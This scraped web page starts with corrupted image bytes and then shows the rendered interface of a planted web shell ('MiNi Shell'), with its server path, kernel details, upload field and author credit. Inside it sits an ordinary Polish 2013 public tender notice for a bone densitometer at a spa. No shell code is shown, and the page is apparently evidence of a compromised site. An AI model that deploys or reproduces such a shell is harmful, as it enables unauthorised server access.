JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130807/157559-N-2013.html

<p class="kh_header"><b>Szczawno Zdrój: Dostawa stacjonarnego, osiowego densytometru dla 
Uzdrowisko Szczawno-Jedlina S.A. w Szczawnie Zdroju</b><br>
<b>Numer ogłoszenia: 157559 - 2013; data zamieszczenia: 07.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Sienkiewicza 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 74 8493201, faks 74 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa stacjonarnego, osiowego densytometru dla 
Uzdrowisko Szczawno-Jedlina S.A. w Szczawnie Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Informacje ogólne

a)Wykonawca jest zobowiązany do wzięcia w rozliczenie densytometru Zamawiającego (Typ DPX, marka LUNAR, rok prod. 1994) i uwzględnienie jego wartości w zaoferowanej cenie nowego aparatu. Wszelkie koszty odbioru densytometru Zamawiającego leżą po stronie Wykonawcy (demontaż, załadunek, rozładunek, transport).Wykonawca ma możliwości dokonania oględzin aparatu Zamawiającego po wcześniejszym ustaleniu terminu z Kierownikiem Centrum Rehabilitacji i Balneologii.
b)Sprzęt medyczny powinien być dopuszczony do użytku szpitalnego i posiadać oznaczenie CE. Wykonawca ponosi odpowiedzialność za zgodność oznakowania, wyposażenia oraz innych parametrów aparatury z obowiązującymi przepisami prawa.
c)Wykonawca jest zobowiązany do dostarczenia przedmiotu zamówienia w terminie 6 tygodni od daty zawarcia umowy. Zawarcie umowy nastąpi w nieprzekraczalnym terminie 3 dni roboczych od dnia, w którym umowa, zgodnie z przepisami Prawa zamówień publicznych może być zawarta. Przedmiot zamówienia zostanie dostarczony na koszt i ryzyko Wykonawcy oraz wydany w stanie gotowym do użytku. Miejsce dostawy: ul. Wojska Polskiego 1, 58-310 Szczawno Zdrój.
d)Wykonawca jest zobowiązany do przeprowadzenia co najmniej jednego szkolenia personelu wskazanego przez  Zamawiającego w zakresie niezbędnym do prawidłowego użytkowania sprzętu. Szkolenie winno się odbyć w terminie 5 dni od daty przekazania przedmiotu zamówienia (termin wskaże Zamawiający). Zamawiający zastrzega sobie prawo do wezwania Wykonawcy do przeprowadzenia dodatkowego szkolenia w terminie ustalonym przez strony lecz nie dłuższym niż 7 dni kalendarzowych od zgłoszenia potrzeby dodatkowego szkolenia przez Zamawiającego.

Serwis gwarancyjny i pogwarancyjny

e)Minimalny okres gwarancji wynosi 24 miesiące. Maksymalny okres gwarancji wynosi 60 miesięcy. Gwarancja winna obejmować usługi serwisowe wraz z okresowymi przeglądami i konserwacją.
f)Gwarancja obejmuje : czas i koszty dojazdu serwisanta, prace serwisu, oględziny i diagnostykę urządzenia, naprawę: wymianę części zamiennych, materiałów i elementów zużywalnych wskazanych w instrukcji serwisowej przez producenta do wymiany w czasie odpowiednich przeglądów gwarancyjnych. Wykonawca jest zobowiązany w zakresie usługi serwisowej przekazać zamawiającemu urządzenie w stanie pełnej gotowości do wykonywania zabiegów.
g)Wykonawca jest zobowiązany w okresie udzielonej gwarancji, do dokonania, co najmniej 1 nieodpłatny przegląd w każdym roku jej obowiązywania wraz z konserwacja na warunkach wynikających z gwarancji producenta.
h)Ostatni przegląd gwarancyjny wraz z wyminą wszystkich części zamiennych, konserwacja urządzenia przez wyspecjalizowany serwis fabryczny powinien być dokonany w ostatnim miesiącu udzielonej gwarancji bez dodatkowego wezwania ze strony Zamawiającego.
i)Wykonawca zobowiązany będzie w ramach serwisu gwarancyjnego do stawienia się w siedzibie Zamawiającego w terminie 48 godzin od otrzymania na piśmie bądź faksem zawiadomienia o awarii, usterce lub wadzie zamontowanego urządzenia oraz do jej usunięcia w terminie 7 dni od powzięcia wiadomości o zaistniałej awarii, usterce lub wadzie.
j)Maksymalny czas usunięcia awarii, usterki lub wady u Zamawiającego w przypadku gdy zaistnieje konieczność sprowadzenia części zamiennych z zagranicy nie może przekroczyć 14 dni od powzięcia wiadomości o zaistniałej awarii, usterce lub wadzie, tj. od otrzymania na piśmie lub faksem zawiadomienia o usterce, wadzie lub awarii zamontowanego urządzenia.  Okoliczność w postaci ewentualnej konieczności sprowadzenia części zamiennych z zagranicy Wykonawca będzie zobowiązany udokumentować.
k)W przypadku nie usunięcia przez Wykonawcę awarii, usterki lub wady w terminie określonym w pkt. i oraz pkt. j lub niestawiennictwa na oględziny w terminie określonym w pkt. h Zamawiający może zlecić usunięcie wad osobie trzeciej na koszt i ryzyko Wykonawcy.
l)W przypadku nie usunięcia przez Wykonawcę awarii, usterki lub wady dostarczonych in zamontowanych urządzeń w czasie do 7 dni liczonych od dnia powzięcia wiadomości o awarii, usterce lub wadzie Wykonawca zobowiązuje się do : dostarczenia w ciągu w/w 7 dni - na czas naprawy - urządzenie zamienne tej samej klasy i o tych  samych parametrach technicznych bez dodatkowych opłat.
m)W przypadku nie wywiązania się przez Wykonawcę ze zobowiązania wynikającego z pkt. j będzie on zobowiązany do pokrycia w całości kosztów przestoju oraz utraconych korzyści.
n)Wykonawca zobowiązany będzie do wymiany aparatury na nową w przypadku wystąpienia w okresie trwania gwarancji trzech istotnych awarii, usterek lub wad. Wymiana gwarancyjna aparatu nastąpi w czasie nie dłuższym niż 30 dni od daty przyjęcia reklamacji.
o)W przypadku sporów powstałych na tle napraw gwarancyjnych, które w ocenie Sprzedawcy stanowią następstwo nieprawidłowego użytkowania przedmiotu umowy przez Kupującego, ten ostatni uprawniony będzie do przekazania sprzętu niezależnemu podmiotowi, w celu dokonania oceny bez utraty gwarancji.
p)W przypadku sprzeczności zapisów pomiędzy gwarancja producenta, a treścią umowy pierwszeństwo w interpretacji przepisów będą miały zapisy umowy.
q)Wykonawca jest zobowiązany do zapewnienia minimum trzyletniej obsługi serwisowej po upływie okresu udzielonej gwarancji.
r)Wykonawca zobowiązany jest do jednego bezpłatnego przeglądu pogwarancyjnego wraz z konserwacją urządzenia w terminie nie krótszym niż 12 miesięcy od zakończenia gwarancji.
s)Gwarancja produkcji części zamiennych min. 5 lat.

Lp.                       Parametry techniczne                             Wymagania
1.Densytometr rentgenowski stacjonarny (stół)	Tak
2.Uchylne ramię detektora	Tak
3.Detektor scyntylacyjny	Tak
4.Zasilanie jednofazowe 230 V, 50 Hz	Tak
5.Wymiary stołu :
Długość : 185 cm - 190 cm
Wysokość : 125 cm - 130 cm
Szerokość : 95 cm - 100 cm	Tak, podać
6.Dopuszczalna przez oprogramowanie waga pacjenta min. 135 kg	Tak, podać
7.Typ formowania wiązki rentgenowskiej	ołówkowa
8.Dawka promieniowania rozproszonego mierzona 1 m od aparatu	<1mRemh
9.Dawka promieniowania przy pomiarze w obszarze:
Kręgosłupa 
Biodra 	
Max. 25 ?Gy

10.Fantom kontrolny, podać typ oraz ilość i wartości wzorcowe dla BMD i % tkanki tłuszczowej	Tak, opisać min. Po 3 wartości wzorcowe dla BMD i % tkanki tłuszczowej
11.Kręgosłup w prezentacji AP	Tak
12.Szyjka kości udowej:
a)BMD
b)BMC
c)Powierzchnia dla krętarza, trzpienia, szyjki, górnej części szyjki udowej, oraz dla Total,
d)wskaźnik T-Score,
e)wskaźnik Z-Score,
f)zmiana procentowa w stosunku do masy szczytowej,
g)zmiana procentowa w stosunku do rówieśników Tak
13.Oprogramowanie do pomiaru gęstości kości w obrębie przedramieniaTak
14.Zestaw komputerowy do obsługi densytometru:
Procesor min. Intel Core i3,
Pamięć RAM min. 4 GB,
Dysk twardy min. 1 TB,
Karta graficzna,
Nagrywarka CD DVD - RW,
Obudowa ATX, mysz, klawiatura,
Monitor LCD min. 17 cali,
Laserowa drukarka kolorowa do drukowania raportów  format A-4,
System operacyjny Windows 7 lub nowszy	

Tak, podać
15.Referencyjna baza danych producenta aparatu dla miejsc pomiarowych :
Kręgosłupa AP, Biodra	Tak, opisać
16.Możliwość tworzenia wielu baz danych, 
z przydzieleniem osobnej nazwy każdej z nich ( nazwisko użytkownika, typy schorzeń itp.)	Tak
17.Raporty z badania	Tak
18.Możliwość dowolnego konfigurowania treści          i wyglądu raportu.	Tak
19.Możliwość rozbudowy aparatu - na dzień składania ofert.	Tak
20.Oprogramowanie do pomiaru gęstości kości w obrębie implantu, z automatyczną klasyfikacja  i analizą stref Gruena	Tak
21.Oprogramowanie do wyznaczania przybliżonego składu ciała	Tak
22.Oprogramowanie pozwalające mierzyć: długość osi szyjki udowej, kąta osi szyjki udowej, położenie środka masy, obliczenie momentu bezwładności.	Tak
23.Oprogramowanie do pracy w sieci DICOM	Tak
24.Interfejs HL 7	Tak
25.Oprogramowanie do bezpośredniego wysyłania raportów z badań poprzez email i fax.	Tak
26.Oprogramowanie w języku polskim	Tak.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 7 u.p.z.p.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.42.58.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą Ofertę wadium w wysokości 4 000,00 zł (słownie:cztery tysiące złotych 00/100 ).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
a)	oświadczenie wg formularza będącego załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie lub wykonywanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co dwóch dostaw aparatury medycznej, o wartości nie mniejszej niż 80 000 PLN (każda).
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
wykaz usług zawierający informacje o dwóch dostawach wykonanych lub wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i podmiotu na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy usługi te zostały wykonane lub są wykonywane należycie, wg załącznika nr 3 do SIWZ.
Za dowody uznaje się: 
1.	poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
2.	Oświadczenie Wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 80 000 PLN.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
a)	Opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 80 000 PLN, (załącznik do Oferty).
Opłacenie polisy winno wynikać z jej treści lub Wykonawca powinien załączyć dokument potwierdzający opłacenie polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">e)	Szczegółowy opis oferowanego sprzętu z podaniem szczegółowej charakterystyki potwierdzającej, że oferowany produkt jest zgodny z opisem przedmiotu zamówienia, nazwy producenta, nazwy produktu lub numeru katalogowego tak aby możliwa była jego identyfikacja. Do oferty należy dołączyć katalog lub folder oferowanego sprzętu (w języku polskim) lub dołączyć tłumaczenie na język polski. W przypadku, gdy załączone katalogi (foldery) nie prezentują produktu identycznego z oferowanym Wykonawca ma obowiązek wykazać rozbieżność i załączyć oświadczenie, że produkt oferowany spełnia wymogi określone w SIWZ, załącznik do oferty.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Lista podmiotów należących do tej samej grupy kapitałowej (w przypadku Wykonawców należących do grupy kapitałowej) lub informacja o tym, że Wykonawca nie należy do grupy kapitałowej; wg załącznika nr 5 do SIWZ.
b)	Pełnomocnictwo w przypadku składania oferty wspólnej, załącznik oferty.
c)	Pełnomocnictwo w przypadku gdy ofertę podpisuje osoba nie wyznaczona w dokumentach do reprezentowania Wykonawcy, załącznik oferty.
d)	Zaparafowany Projekt Umowy wg załącznika nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji udzielonej na aparaturę - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje zmianę umowy w następujących przypadkach:
1)	gdy zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna);
2)	gdy konieczność wprowadzenia modyfikacji wyniknie ze zmiany powszechnie obowiązujących przepisów prawa, na mocy których na Zamawiającego lub Wykonawcę nałożony zostanie obowiązek realizowania przedmiotu zamówienia w sposób różniący się od zaoferowanego w ofercie lub obowiązek zmiany trybu wykonania inwestycji - z zastrzeżeniem, że zmiana przepisów nie była uchwalona przed wszczęciem postępowania o udzielenie zamówienia publicznego, w wyniku którego zawarto umowę.
3)	gdy podczas realizacji umowy wystąpią nieprzewidywalne na etapie zawierania umowy okoliczności, które uniemożliwią zrealizowanie przedmiotu zamówienia w sposób przewidziany w ofercie, a udzielenie w tym zakresie innego zamówienia publicznego będzie niemożliwe lub niecelowe ze względu na interes publiczny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawno-jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A., ul. Sienkiewicza1, 58-310 Szczawno Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 10:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A., ul. Sienkiewicza1, 58-310 Szczawno Zdrój, Kancelaria (pok. 1-3, parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com